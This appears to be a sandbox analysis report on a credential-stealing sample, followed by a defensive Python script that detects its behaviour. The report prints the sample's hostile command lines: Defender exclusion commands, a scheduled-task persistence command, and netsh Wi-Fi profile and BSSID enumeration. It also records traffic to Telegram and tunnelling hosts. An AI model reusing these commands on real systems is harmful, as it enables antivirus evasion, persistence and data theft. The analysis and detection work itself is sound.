IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x2000 | 0x8 | .text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x2008 | 0x48 | .text
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x2000 | 0x2d1c | 0x2e00 | 6a50215a4de9009c9822c87b3aefe82a | False | 0.5207201086956522 | data | 5.580839345941778 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rsrc | 0x6000 | 0x59c | 0x600 | 32791b53ec0675637a2192fac6511faa | False | 0.4166666666666667 | data | 4.030670859022482 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc | 0x8000 | 0xc | 0x200 | 6136f169555e82248bf6cc07cc9f65cc | False | 0.044921875 | data | 0.08153941234324169 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
Name | RVA | Size | Type | Language | Country | ZLIB Complexity
RT_VERSION | 0x6090 | 0x30c | data | | | 0.4358974358974359
RT_MANIFEST | 0x63ac | 0x1ea | XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators | | | 0.5489795918367347
DLL | Import
mscoree.dll | _CorExeMain
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Feb 10, 2024 16:17:08.365370989 CET | 49729 | 80 | 192.168.2.4 | 82.147.85.194
Feb 10, 2024 16:17:08.642452955 CET | 80 | 49729 | 82.147.85.194 | 192.168.2.4
Feb 10, 2024 16:17:08.642586946 CET | 49729 | 80 | 192.168.2.4 | 82.147.85.194
Feb 10, 2024 16:17:08.643671036 CET | 49729 | 80 | 192.168.2.4 | 82.147.85.194
Feb 10, 2024 16:17:08.921837091 CET | 80 | 49729 | 82.147.85.194 | 192.168.2.4
Feb 10, 2024 16:17:08.921875000 CET | 80 | 49729 | 82.147.85.194 | 192.168.2.4
Feb 10, 2024 16:17:08.921915054 CET | 80 | 49729 | 82.147.85.194 | 192.168.2.4
Feb 10, 2024 16:17:08.921937943 CET | 80 | 49729 | 82.147.85.194 | 192.168.2.4
Feb 10, 2024 16:17:08.921937943 CET | 49729 | 80 | 192.168.2.4 | 82.147.85.194
Feb 10, 2024 16:17:08.921962976 CET | 80 | 49729 | 82.147.85.194 | 192.168.2.4
Feb 10, 2024 16:17:08.921992064 CET | 80 | 49729 | 82.147.85.194 | 192.168.2.4
Feb 10, 2024 16:17:08.921998024 CET | 49729 | 80 | 192.168.2.4 | 82.147.85.194
Feb 10, 2024 16:17:08.922015905 CET | 80 | 49729 | 82.147.85.194 | 192.168.2.4
Feb 10, 2024 16:17:08.922038078 CET | 49729 | 80 | 192.168.2.4 | 82.147.85.194
Feb 10, 2024 16:17:08.922040939 CET | 80 | 49729 | 82.147.85.194 | 192.168.2.4
Feb 10, 2024 16:17:08.922065973 CET | 80 | 49729 | 82.147.85.194 | 192.168.2.4
Feb 10, 2024 16:17:08.922085047 CET | 49729 | 80 | 192.168.2.4 | 82.147.85.194
Feb 10, 2024 16:17:08.922091961 CET | 80 | 49729 | 82.147.85.194 | 192.168.2.4
Feb 10, 2024 16:17:08.922133923 CET | 49729 | 80 | 192.168.2.4 | 82.147.85.194
Feb 10, 2024 16:17:09.198327065 CET | 80 | 49729 | 82.147.85.194 | 192.168.2.4
Feb 10, 2024 16:17:09.198416948 CET | 80 | 49729 | 82.147.85.194 | 192.168.2.4
Feb 10, 2024 16:17:09.198472023 CET | 80 | 49729 | 82.147.85.194 | 192.168.2.4
Feb 10, 2024 16:17:09.198520899 CET | 80 | 49729 | 82.147.85.194 | 192.168.2.4
Feb 10, 2024 16:17:09.198577881 CET | 80 | 49729 | 82.147.85.194 | 192.168.2.4
Feb 10, 2024 16:17:09.198628902 CET | 80 | 49729 | 82.147.85.194 | 192.168.2.4
Feb 10, 2024 16:17:09.198632002 CET | 49729 | 80 | 192.168.2.4 | 82.147.85.194
Feb 10, 2024 16:17:09.198632956 CET | 49729 | 80 | 192.168.2.4 | 82.147.85.194
Feb 10, 2024 16:17:09.198682070 CET | 80 | 49729 | 82.147.85.194 | 192.168.2.4
Feb 10, 2024 16:17:09.198738098 CET | 80 | 49729 | 82.147.85.194 | 192.168.2.4
Feb 10, 2024 16:17:09.198787928 CET | 80 | 49729 | 82.147.85.194 | 192.168.2.4
Feb 10, 2024 16:17:09.198803902 CET | 49729 | 80 | 192.168.2.4 | 82.147.85.194
Feb 10, 2024 16:17:09.198803902 CET | 49729 | 80 | 192.168.2.4 | 82.147.85.194
Feb 10, 2024 16:17:09.198865891 CET | 80 | 49729 | 82.147.85.194 | 192.168.2.4
Feb 10, 2024 16:17:09.198925018 CET | 80 | 49729 | 82.147.85.194 | 192.168.2.4
Feb 10, 2024 16:17:09.198980093 CET | 80 | 49729 | 82.147.85.194 | 192.168.2.4
Feb 10, 2024 16:17:09.199033022 CET | 80 | 49729 | 82.147.85.194 | 192.168.2.4
Feb 10, 2024 16:17:09.199038029 CET | 49729 | 80 | 192.168.2.4 | 82.147.85.194
Feb 10, 2024 16:17:09.199038029 CET | 49729 | 80 | 192.168.2.4 | 82.147.85.194
Feb 10, 2024 16:17:09.199084997 CET | 80 | 49729 | 82.147.85.194 | 192.168.2.4
Feb 10, 2024 16:17:09.199136972 CET | 80 | 49729 | 82.147.85.194 | 192.168.2.4
Feb 10, 2024 16:17:09.199139118 CET | 49729 | 80 | 192.168.2.4 | 82.147.85.194
Feb 10, 2024 16:17:09.199191093 CET | 80 | 49729 | 82.147.85.194 | 192.168.2.4
Feb 10, 2024 16:17:09.199239969 CET | 49729 | 80 | 192.168.2.4 | 82.147.85.194
Feb 10, 2024 16:17:09.199240923 CET | 80 | 49729 | 82.147.85.194 | 192.168.2.4
Feb 10, 2024 16:17:09.199291945 CET | 80 | 49729 | 82.147.85.194 | 192.168.2.4
Feb 10, 2024 16:17:09.199342966 CET | 80 | 49729 | 82.147.85.194 | 192.168.2.4
Feb 10, 2024 16:17:09.199343920 CET | 49729 | 80 | 192.168.2.4 | 82.147.85.194
Feb 10, 2024 16:17:09.199394941 CET | 80 | 49729 | 82.147.85.194 | 192.168.2.4
Feb 10, 2024 16:17:09.199445009 CET | 49729 | 80 | 192.168.2.4 | 82.147.85.194
Feb 10, 2024 16:17:09.475084066 CET | 80 | 49729 | 82.147.85.194 | 192.168.2.4
Feb 10, 2024 16:17:09.475115061 CET | 80 | 49729 | 82.147.85.194 | 192.168.2.4
Feb 10, 2024 16:17:09.475151062 CET | 80 | 49729 | 82.147.85.194 | 192.168.2.4
                                                                                                    Feb 10, 2024 16:17:09.475173950 CET804972982.147.85.194192.168.2.4
                                                                                                    Feb 10, 2024 16:17:09.475181103 CET4972980192.168.2.482.147.85.194
                                                                                                    Feb 10, 2024 16:17:09.475197077 CET804972982.147.85.194192.168.2.4
                                                                                                    Feb 10, 2024 16:17:09.475224972 CET4972980192.168.2.482.147.85.194
                                                                                                    Feb 10, 2024 16:17:09.475228071 CET804972982.147.85.194192.168.2.4
                                                                                                    Feb 10, 2024 16:17:09.475249052 CET804972982.147.85.194192.168.2.4
                                                                                                    Feb 10, 2024 16:17:09.475274086 CET4972980192.168.2.482.147.85.194
                                                                                                    Feb 10, 2024 16:17:09.475277901 CET804972982.147.85.194192.168.2.4
                                                                                                    Feb 10, 2024 16:17:09.475301981 CET804972982.147.85.194192.168.2.4
                                                                                                    Feb 10, 2024 16:17:09.475325108 CET4972980192.168.2.482.147.85.194
                                                                                                    Feb 10, 2024 16:17:09.475327015 CET804972982.147.85.194192.168.2.4
                                                                                                    Feb 10, 2024 16:17:09.475348949 CET804972982.147.85.194192.168.2.4
                                                                                                    Feb 10, 2024 16:17:09.475374937 CET4972980192.168.2.482.147.85.194
                                                                                                    Feb 10, 2024 16:17:09.475375891 CET804972982.147.85.194192.168.2.4
                                                                                                    Feb 10, 2024 16:17:09.475399017 CET804972982.147.85.194192.168.2.4
                                                                                                    Feb 10, 2024 16:17:09.475419998 CET804972982.147.85.194192.168.2.4
                                                                                                    Feb 10, 2024 16:17:09.475420952 CET4972980192.168.2.482.147.85.194
                                                                                                    Feb 10, 2024 16:17:09.475449085 CET804972982.147.85.194192.168.2.4
                                                                                                    Feb 10, 2024 16:17:09.475465059 CET4972980192.168.2.482.147.85.194
                                                                                                    Feb 10, 2024 16:17:09.475474119 CET804972982.147.85.194192.168.2.4
                                                                                                    Feb 10, 2024 16:17:09.475497007 CET804972982.147.85.194192.168.2.4
                                                                                                    Feb 10, 2024 16:17:09.475517035 CET804972982.147.85.194192.168.2.4
                                                                                                    Feb 10, 2024 16:17:09.475517035 CET4972980192.168.2.482.147.85.194
                                                                                                    Feb 10, 2024 16:17:09.475543976 CET804972982.147.85.194192.168.2.4
                                                                                                    Feb 10, 2024 16:17:09.475560904 CET4972980192.168.2.482.147.85.194
                                                                                                    Feb 10, 2024 16:17:09.475565910 CET804972982.147.85.194192.168.2.4
                                                                                                    Feb 10, 2024 16:17:09.475589991 CET804972982.147.85.194192.168.2.4
                                                                                                    Feb 10, 2024 16:17:09.475611925 CET804972982.147.85.194192.168.2.4
                                                                                                    Feb 10, 2024 16:17:09.475621939 CET4972980192.168.2.482.147.85.194
                                                                                                    Feb 10, 2024 16:17:09.475636005 CET804972982.147.85.194192.168.2.4
                                                                                                    Feb 10, 2024 16:17:09.475657940 CET4972980192.168.2.482.147.85.194
                                                                                                    Feb 10, 2024 16:17:09.475658894 CET804972982.147.85.194192.168.2.4
                                                                                                    Feb 10, 2024 16:17:09.475682020 CET804972982.147.85.194192.168.2.4
                                                                                                    Feb 10, 2024 16:17:09.475706100 CET804972982.147.85.194192.168.2.4
                                                                                                    Feb 10, 2024 16:17:09.475714922 CET4972980192.168.2.482.147.85.194
                                                                                                    Feb 10, 2024 16:17:09.475728989 CET804972982.147.85.194192.168.2.4
                                                                                                    Feb 10, 2024 16:17:09.475750923 CET804972982.147.85.194192.168.2.4
                                                                                                    Feb 10, 2024 16:17:09.475752115 CET4972980192.168.2.482.147.85.194
                                                                                                    Feb 10, 2024 16:17:09.475775003 CET804972982.147.85.194192.168.2.4
                                                                                                    Feb 10, 2024 16:17:09.475795984 CET4972980192.168.2.482.147.85.194
                                                                                                    Feb 10, 2024 16:17:09.475797892 CET804972982.147.85.194192.168.2.4
                                                                                                    Feb 10, 2024 16:17:09.475821018 CET804972982.147.85.194192.168.2.4
                                                                                                    Feb 10, 2024 16:17:09.475841045 CET804972982.147.85.194192.168.2.4
                                                                                                    Feb 10, 2024 16:17:09.475841999 CET4972980192.168.2.482.147.85.194
                                                                                                    Feb 10, 2024 16:17:09.475867987 CET804972982.147.85.194192.168.2.4
                                                                                                    Feb 10, 2024 16:17:09.475888014 CET4972980192.168.2.482.147.85.194
                                                                                                    Feb 10, 2024 16:17:09.475891113 CET804972982.147.85.194192.168.2.4
                                                                                                    Feb 10, 2024 16:17:09.475914001 CET804972982.147.85.194192.168.2.4
UDP Packets

Timestamp                              Source Port  Dest Port  Source IP    Dest IP
Feb 10, 2024 16:17:17.405252934 CET    51954        53         192.168.2.4  1.1.1.1
Feb 10, 2024 16:17:17.523276091 CET    53           51954      1.1.1.1      192.168.2.4
Feb 10, 2024 16:17:18.442881107 CET    58800        53         192.168.2.4  1.1.1.1
Feb 10, 2024 16:17:18.678560972 CET    53           58800      1.1.1.1      192.168.2.4
Feb 10, 2024 16:17:19.532113075 CET    52616        53         192.168.2.4  1.1.1.1
Feb 10, 2024 16:17:19.649746895 CET    53           52616      1.1.1.1      192.168.2.4
DNS Queries

Timestamp                              Source IP    Dest IP  Trans ID  OP Code             Name              Type            Class        DNS over HTTPS
Feb 10, 2024 16:17:17.405252934 CET    192.168.2.4  1.1.1.1  0xc02b    Standard query (0)  ip-api.com        A (IP address)  IN (0x0001)  false
Feb 10, 2024 16:17:18.442881107 CET    192.168.2.4  1.1.1.1  0xd06d    Standard query (0)  serveo.net        A (IP address)  IN (0x0001)  false
Feb 10, 2024 16:17:19.532113075 CET    192.168.2.4  1.1.1.1  0xa81f    Standard query (0)  api.telegram.org  A (IP address)  IN (0x0001)  false
DNS Answers

Timestamp                              Source IP  Dest IP      Trans ID  Reply Code    Name              CName  Address          Type            Class        DNS over HTTPS
Feb 10, 2024 16:17:17.523276091 CET    1.1.1.1    192.168.2.4  0xc02b    No error (0)  ip-api.com        -      208.95.112.1     A (IP address)  IN (0x0001)  false
Feb 10, 2024 16:17:18.678560972 CET    1.1.1.1    192.168.2.4  0xd06d    No error (0)  serveo.net        -      138.68.79.95     A (IP address)  IN (0x0001)  false
Feb 10, 2024 16:17:19.649746895 CET    1.1.1.1    192.168.2.4  0xa81f    No error (0)  api.telegram.org  -      149.154.167.220  A (IP address)  IN (0x0001)  false
HTTP Request Dependency Graph

• api.telegram.org
• 82.147.85.194
• ip-api.com


Target ID: 0
Start time: 16:16:54
Start date: 10/02/2024
Path: C:\Users\user\Desktop\jqOHOuPMJP.exe
Wow64 process (32bit): true
Commandline: C:\Users\user\Desktop\jqOHOuPMJP.exe
Imagebase: 0x940000
File size: 14'336 bytes
MD5 hash: 7E9A93C69AECFC2BBDA9470FBD4556DB
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: low
Has exited: true

Target ID: 1
Start time: 16:16:59
Start date: 10/02/2024
Path: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit): true
Commandline: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\jqOHOuPMJP.exe'; Add-MpPreference -ExclusionProcess 'jqOHOuPMJP'; Add-MpPreference -ExclusionPath 'C:\Windows'; Add-MpPreference -ExclusionPath 'C:\Users\user'
Imagebase: 0x650000
File size: 433'152 bytes
MD5 hash: C32CA4ACFCC635EC1EA6ED8A34DF5FAC
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high
Has exited: true

Target ID: 2
Start time: 16:16:59
Start date: 10/02/2024
Path: C:\Windows\System32\conhost.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase: 0x7ff7699e0000
File size: 862'208 bytes
MD5 hash: 0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high
Has exited: true

Target ID: 3
Start time: 16:17:00
Start date: 10/02/2024
Path: C:\Windows\System32\wbem\WmiPrvSE.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
Imagebase: 0x7ff693ab0000
File size: 496'640 bytes
MD5 hash: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51
Has elevated privileges: true
Has administrator privileges: false
Programmed in: C, C++ or other language
Reputation: moderate
Has exited: true

Target ID: 4
Start time: 16:17:09
Start date: 10/02/2024
Path: C:\Users\user\AppData\Local\Temp\vkefq4cv.oil.exe
Wow64 process (32bit): false
Commandline: "C:\Users\user\AppData\Local\Temp\vkefq4cv.oil.exe"
Imagebase: 0x1f995eb0000
File size: 131'528 bytes
MD5 hash: 869F82DF0992DC2F5155D8F69FD1C9CF
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Yara matches:
• Rule: JoeSecurity_GurcuStealer, Description: Yara detected Gurcu Stealer, Source: 00000004.00000002.1822502459.000001F997DF1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: C:\Users\user\AppData\Local\Temp\vkefq4cv.oil.exe, Author: Joe Security
Antivirus matches:
• Detection: 100%, Joe Sandbox ML
Reputation: low
Has exited: true

Target ID: 5
Start time: 16:17:12
Start date: 10/02/2024
Path: C:\Windows\System32\cmd.exe
Wow64 process (32bit): false
Commandline: C:\Windows\System32\cmd.exe" /C chcp 65001 && timeout /t 3 > NUL && schtasks /create /tn "vkefq4cv.oil" /sc MINUTE /tr "C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe" /rl HIGHEST /f && DEL /F /S /Q /A "C:\Users\user\AppData\Local\Temp\vkefq4cv.oil.exe" &&START "" "C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe
Imagebase: 0x7ff677710000
File size: 289'792 bytes
MD5 hash: 8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high
Has exited: true

Target ID: 6
Start time: 16:17:12
Start date: 10/02/2024
Path: C:\Windows\System32\conhost.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase: 0x7ff7699e0000
File size: 862'208 bytes
MD5 hash: 0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high
Has exited: true

Target ID: 7
Start time: 16:17:12
Start date: 10/02/2024
Path: C:\Windows\System32\chcp.com
Wow64 process (32bit): false
Commandline: chcp 65001
Imagebase: 0x7ff6bf650000
File size: 14'848 bytes
MD5 hash: 33395C4732A49065EA72590B14B64F32
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: moderate
Has exited: true

Target ID: 8
Start time: 16:17:12
Start date: 10/02/2024
Path: C:\Windows\System32\timeout.exe
Wow64 process (32bit): false
Commandline: timeout /t 3
Imagebase: 0x7ff61b030000
File size: 32'768 bytes
MD5 hash: 100065E21CFBBDE57CBA2838921F84D6
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: moderate
Has exited: true

Target ID: 10
Start time: 16:17:15
Start date: 10/02/2024
Path: C:\Windows\System32\schtasks.exe
Wow64 process (32bit): false
Commandline: schtasks /create /tn "vkefq4cv.oil" /sc MINUTE /tr "C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe" /rl HIGHEST /f
Imagebase: 0x7ff76f990000
File size: 235'008 bytes
MD5 hash: 76CD6626DD8834BD4A42E6A565104DC2
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: moderate
Has exited: true

                                                                                                    Target ID:11
                                                                                                    Start time:16:17:15
                                                                                                    Start date:10/02/2024
                                                                                                    Path:C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe
                                                                                                    Wow64 process (32bit):false
                                                                                                    Commandline:"C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe"
                                                                                                    Imagebase:0x1b8a9a90000
                                                                                                    File size:131'528 bytes
                                                                                                    MD5 hash:869F82DF0992DC2F5155D8F69FD1C9CF
                                                                                                    Has elevated privileges:true
                                                                                                    Has administrator privileges:true
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Yara matches:
                                                                                                    • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000B.00000002.4118051146.000001B8AB951000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                    • Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe, Author: Joe Security
                                                                                                    Antivirus matches:
                                                                                                    • Detection: 100%, Joe Sandbox ML
                                                                                                    Reputation:low
                                                                                                    Has exited:false

                                                                                                    Target ID:12
                                                                                                    Start time:16:17:15
                                                                                                    Start date:10/02/2024
                                                                                                    Path:C:\Windows\System32\cmd.exe
                                                                                                    Wow64 process (32bit):false
                                                                                                    Commandline:"cmd.exe" /c chcp 65001 && netsh wlan show profiles|findstr /R /C:"[ ]:[ ]"
                                                                                                    Imagebase:0x7ff677710000
                                                                                                    File size:289'792 bytes
                                                                                                    MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                    Has elevated privileges:true
                                                                                                    Has administrator privileges:true
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Reputation:high
                                                                                                    Has exited:true

                                                                                                    Target ID:13
                                                                                                    Start time:16:17:15
                                                                                                    Start date:10/02/2024
                                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                                    Wow64 process (32bit):false
                                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                    Imagebase:0x7ff7699e0000
                                                                                                    File size:862'208 bytes
                                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                    Has elevated privileges:true
                                                                                                    Has administrator privileges:true
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Reputation:high
                                                                                                    Has exited:true

                                                                                                    Target ID:14
                                                                                                    Start time:16:17:15
                                                                                                    Start date:10/02/2024
                                                                                                    Path:C:\Windows\System32\chcp.com
                                                                                                    Wow64 process (32bit):false
                                                                                                    Commandline:chcp 65001
                                                                                                    Imagebase:0x7ff6bf650000
                                                                                                    File size:14'848 bytes
                                                                                                    MD5 hash:33395C4732A49065EA72590B14B64F32
                                                                                                    Has elevated privileges:true
                                                                                                    Has administrator privileges:true
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Reputation:moderate
                                                                                                    Has exited:true

                                                                                                    Target ID:15
                                                                                                    Start time:16:17:15
                                                                                                    Start date:10/02/2024
                                                                                                    Path:C:\Windows\System32\netsh.exe
                                                                                                    Wow64 process (32bit):false
                                                                                                    Commandline:netsh wlan show profiles
                                                                                                    Imagebase:0x7ff6bc470000
                                                                                                    File size:96'768 bytes
                                                                                                    MD5 hash:6F1E6DD688818BC3D1391D0CC7D597EB
                                                                                                    Has elevated privileges:true
                                                                                                    Has administrator privileges:true
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Reputation:moderate
                                                                                                    Has exited:true

                                                                                                    Target ID:16
                                                                                                    Start time:16:17:15
                                                                                                    Start date:10/02/2024
                                                                                                    Path:C:\Windows\System32\findstr.exe
                                                                                                    Wow64 process (32bit):false
                                                                                                    Commandline:findstr /R /C:"[ ]:[ ]"
                                                                                                    Imagebase:0x7ff6c7230000
                                                                                                    File size:36'352 bytes
                                                                                                    MD5 hash:804A6AE28E88689E0CF1946A6CB3FEE5
                                                                                                    Has elevated privileges:true
                                                                                                    Has administrator privileges:true
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Has exited:true

                                                                                                    Target ID:17
                                                                                                    Start time:16:17:16
                                                                                                    Start date:10/02/2024
                                                                                                    Path:C:\Windows\System32\cmd.exe
                                                                                                    Wow64 process (32bit):false
                                                                                                    Commandline:"cmd.exe" /c chcp 65001 && netsh wlan show networks mode=bssid | findstr "SSID BSSID Signal"
                                                                                                    Imagebase:0x7ff677710000
                                                                                                    File size:289'792 bytes
                                                                                                    MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                    Has elevated privileges:true
                                                                                                    Has administrator privileges:true
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Has exited:true

                                                                                                    Target ID:18
                                                                                                    Start time:16:17:16
                                                                                                    Start date:10/02/2024
                                                                                                    Path:C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe
                                                                                                    Wow64 process (32bit):false
                                                                                                    Commandline:C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe
                                                                                                    Imagebase:0x10dd5580000
                                                                                                    File size:131'528 bytes
                                                                                                    MD5 hash:869F82DF0992DC2F5155D8F69FD1C9CF
                                                                                                    Has elevated privileges:true
                                                                                                    Has administrator privileges:true
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Yara matches:
                                                                                                    • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000012.00000002.2064616867.0000010DD73F1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                    Has exited:true

                                                                                                    Target ID:19
                                                                                                    Start time:16:17:16
                                                                                                    Start date:10/02/2024
                                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                                    Wow64 process (32bit):false
                                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                    Imagebase:0x7ff7699e0000
                                                                                                    File size:862'208 bytes
                                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                    Has elevated privileges:true
                                                                                                    Has administrator privileges:true
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Has exited:true

                                                                                                    Target ID:20
                                                                                                    Start time:16:17:16
                                                                                                    Start date:10/02/2024
                                                                                                    Path:C:\Windows\System32\chcp.com
                                                                                                    Wow64 process (32bit):false
                                                                                                    Commandline:chcp 65001
                                                                                                    Imagebase:0x7ff6bf650000
                                                                                                    File size:14'848 bytes
                                                                                                    MD5 hash:33395C4732A49065EA72590B14B64F32
                                                                                                    Has elevated privileges:true
                                                                                                    Has administrator privileges:true
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Has exited:true

                                                                                                    Target ID:21
                                                                                                    Start time:16:17:16
                                                                                                    Start date:10/02/2024
                                                                                                    Path:C:\Windows\System32\netsh.exe
                                                                                                    Wow64 process (32bit):false
                                                                                                    Commandline:netsh wlan show networks mode=bssid
                                                                                                    Imagebase:0x7ff6bc470000
                                                                                                    File size:96'768 bytes
                                                                                                    MD5 hash:6F1E6DD688818BC3D1391D0CC7D597EB
                                                                                                    Has elevated privileges:true
                                                                                                    Has administrator privileges:true
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Has exited:true

                                                                                                    Target ID:22
                                                                                                    Start time:16:17:16
                                                                                                    Start date:10/02/2024
                                                                                                    Path:C:\Windows\System32\findstr.exe
                                                                                                    Wow64 process (32bit):false
                                                                                                    Commandline:findstr "SSID BSSID Signal"
                                                                                                    Imagebase:0x7ff6c7230000
                                                                                                    File size:36'352 bytes
                                                                                                    MD5 hash:804A6AE28E88689E0CF1946A6CB3FEE5
                                                                                                    Has elevated privileges:true
                                                                                                    Has administrator privileges:true
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Has exited:true
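
Detection logic for the chain recorded in Targets 10 through 22 above (the schtasks /create ... /sc MINUTE ... /rl HIGHEST persistence task, then the repeated cmd.exe /c chcp 65001 && netsh wlan show profiles|findstr and netsh wlan show networks mode=bssid|findstr pairs), as an added example that is not part of the Joe Sandbox report or of the sample itself. It runs offline over constructed process-creation events: images and command lines are copied from the process list, while the PIDs, parent links and the three benign control events are invented, since this section does not show parent relationships. The chcp 65001 prefix switches the console to UTF-8 so the stealer can parse netsh's localized output, and the findstr /R /C:"[ ]:[ ]" filter keeps only the "name : value" lines of the profile listing; the key=clear step that normally follows profile enumeration is not in the visible list and is deliberately not assumed. The rules key on netsh.exe and schtasks.exe for the technique and on cmd.exe for the wrapper, then walk parent links to the first binary outside C:\Windows, which is what to block.

```python
"""Flag the persistence and Wi-Fi reconnaissance chain seen in the process
list and attribute each hit to the non-Windows binary that launched it."""
import re
from dataclasses import dataclass
from typing import Callable, Dict, List, Optional, Tuple


@dataclass(frozen=True)
class ProcEvent:
    pid: int
    ppid: int
    image: str
    cmdline: str


# Directories a stealer can write to and launch from; the first alternative
# covers %LOCALAPPDATA%\RobloxSecurity from the report.
USER_WRITABLE = re.compile(
    r"\\users\\[^\\]+\\appdata\\|\\programdata\\|\\users\\public\\|\\temp\\", re.I
)
WINDOWS_DIR = re.compile(r"^c:\\windows\\", re.I)


def _squash(cmdline: str) -> str:
    return re.sub(r"\s+", " ", cmdline.lower())


def _rule_schtasks_persistence(ev: ProcEvent) -> bool:
    """schtasks /create running a user-writable binary at the highest run
    level; /sc MINUTE, as in the report, makes it relaunch every minute."""
    if not ev.image.lower().endswith("\\schtasks.exe"):
        return False
    cl = _squash(ev.cmdline)
    if "/create" not in cl or "/rl highest" not in cl:
        return False
    m = re.search(r'/tr\s+"([^"]+)"', ev.cmdline, re.I) or re.search(r"/tr\s+(\S+)", ev.cmdline, re.I)
    return bool(m and USER_WRITABLE.search(m.group(1)))


def _rule_chcp_netsh_wrapper(ev: ProcEvent) -> bool:
    """cmd.exe /c chcp 65001 && netsh wlan ...: the UTF-8 code-page switch in
    front of netsh is rare in interactive use and typical of tooling that
    parses the redirected output."""
    cl = _squash(ev.cmdline)
    return ev.image.lower().endswith("\\cmd.exe") and "chcp 65001" in cl and "netsh wlan" in cl


def _rule_wlan_profiles(ev: ProcEvent) -> bool:
    """Enumeration of saved Wi-Fi profiles (also matches 'show profile name=...')."""
    return ev.image.lower().endswith("\\netsh.exe") and "wlan show profile" in _squash(ev.cmdline)


def _rule_wlan_bssid(ev: ProcEvent) -> bool:
    """Survey of nearby access points with BSSIDs, usable for geolocation."""
    cl = _squash(ev.cmdline)
    return ev.image.lower().endswith("\\netsh.exe") and "wlan show networks" in cl and "mode=bssid" in cl


RULES: Dict[str, Callable[[ProcEvent], bool]] = {
    "schtasks_persistence_user_writable": _rule_schtasks_persistence,
    "cmd_chcp65001_netsh_wlan": _rule_chcp_netsh_wrapper,
    "netsh_wlan_profile_enum": _rule_wlan_profiles,
    "netsh_wlan_bssid_survey": _rule_wlan_bssid,
}


def responsible_ancestor(ev: ProcEvent, by_pid: Dict[int, ProcEvent]) -> Optional[ProcEvent]:
    """Walk ppid links up to the first process whose image is outside
    C:\\Windows; cmd.exe, chcp.com, netsh.exe and findstr.exe are
    living-off-the-land tools, the binary that drove them is the finding."""
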